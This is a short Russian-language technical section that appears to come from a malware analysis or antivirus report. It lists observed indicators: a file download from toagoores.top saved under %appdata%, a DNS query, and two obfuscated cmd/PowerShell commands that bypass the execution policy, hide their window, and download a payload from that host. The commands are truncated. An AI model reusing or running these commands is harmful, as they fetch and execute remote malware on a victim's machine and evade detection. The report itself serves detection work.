Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwERshEl^L^.e^XE -e^xEc^UtiO^NpoliCY bYpaSs -no^PrOf^i^L^E^ -wI^NDoWsty^Le H^IdDE^n^ (n^EW-ObJeC^t^ ^SY^s^tEm.NEt^.Web^C^LIEN^t).d^o^Wn^lOA^dfiL^e^('http://toagoores.top/read...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "POwERshEl^L^.e^XE -e^xEc^UtiO^NpoliCY bYpaSs -no^PrOf^i^L^E^ -wI^NDoWsty^Le H^IdDE^n^ (n^EW-ObJeC^t^ ^SY^s^tEm.NEt^.Web^C^LIEN^t).d^o^Wn^lOA^dfiL^e^('http://toagoores.top/read...' (со скрытым окном)